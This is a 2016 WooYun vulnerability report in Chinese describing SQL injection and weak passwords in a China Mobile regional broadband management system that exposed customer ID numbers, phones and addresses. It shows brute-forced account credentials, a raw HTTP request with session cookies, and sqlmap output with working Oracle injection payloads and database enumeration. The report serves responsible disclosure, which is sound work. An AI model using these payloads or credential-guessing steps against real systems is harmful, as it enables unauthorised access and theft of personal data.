当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168885

漏洞标题:移动某地区宽带管理系统导致全市安装订单泄露(身份证/手机号/地址)

相关厂商:中国移动

漏洞作者: 路人甲

提交时间:2016-01-10 19:22

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-10: 细节已通知厂商并且等待厂商处理中
2016-01-14: 厂商已经确认,细节仅向厂商公开
2016-01-24: 细节向核心白帽子及相关领域专家公开
2016-02-03: 细节向普通白帽子公开
2016-02-13: 细节向实习白帽子公开

简要描述:

移动信息泄露

详细说明:

缺陷地址: **.**.**.**:8888/Admin/Account/Login?ReturnUrl=%2F

7.PNG


首先burp 姓名爆破
liuyu/111111
权限较小
也有4000个用户

1.PNG


继续深入寻找高权限用户
#2注入 应该有很多处 因为很多地方都可以查询

GET /Broadband/Report/PlansMoneyTotal?Search.District=1&Search.PlansMoney=1 HTTP/1.1
Host: **.**.**.**:8888
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: __RequestVerificationToken=2jASattMWL2Q1IdJrjqSkwM4eepECJpPGRft_tczDVzY7f0xZe7PfIhZOKHhMpcmyJx4w1wlVagLaKum9kqJrXP1FXK5LQiEFr1QK0G-CT9p2TML6UTJj-3YRNDsZiwPQZke5y2sK6cJjZsaPYtteg2; .ASPXAUTH=AFCFC8445BAE93599E590B9A9CE2799C464162CE7DF6E2C197A75C18B1B46B8CD719CF25E365388DB8359AE4351811CBA6D055CD764067408CB91C4D086ACCED0E4085A56974B28CD1B57FA2C683B897646E8CA83DEDBCAF15245146CE82B781F79B1E5AAAB1C20AEA86F860743464E7C95B02B1007DB2759AFD7BA385D541ED25D65E1AF5B465E2A57D9757CFF8BE11


sqlmap identified the following injection point(s) with a total of 140 HTTP(s) requests:
---
Parameter: Search.District (GET)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: Search.District=1' AND 7561=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7561=7561) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(122)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND 'bTUn' LIKE 'bTUn&Search.PlansMoney=1
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: Search.District=1' AND 2250=DBMS_PIPE.RECEIVE_MESSAGE(CHR(110)||CHR(117)||CHR(109)||CHR(67),5) AND 'rKTP' LIKE 'rKTP&Search.PlansMoney=1
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Oracle
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Search.District (GET)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: Search.District=1' AND 7561=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7561=7561) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(122)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND 'bTUn' LIKE 'bTUn&Search.PlansMoney=1
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: Search.District=1' AND 2250=DBMS_PIPE.RECEIVE_MESSAGE(CHR(110)||CHR(117)||CHR(109)||CHR(67),5) AND 'rKTP' LIKE 'rKTP&Search.PlansMoney=1
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Oracle
available databases [24]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
[*] YAWL
24个库


找到用户名和密码表后发现加密方式应该带key无法解密
K = 111111
7MurghRTdiM = 123456 能看到

n.png


拿一些数据测试

b.PNG


漏洞证明:

刘怀琪/111111 权限很高

4.PNG


8.PNG


一万多信息

2.PNG


变更业务套餐等

j.PNG


修复方案:

修复弱口令和后台大量注入

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-01-14 16:22

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无

漏洞评价:

评价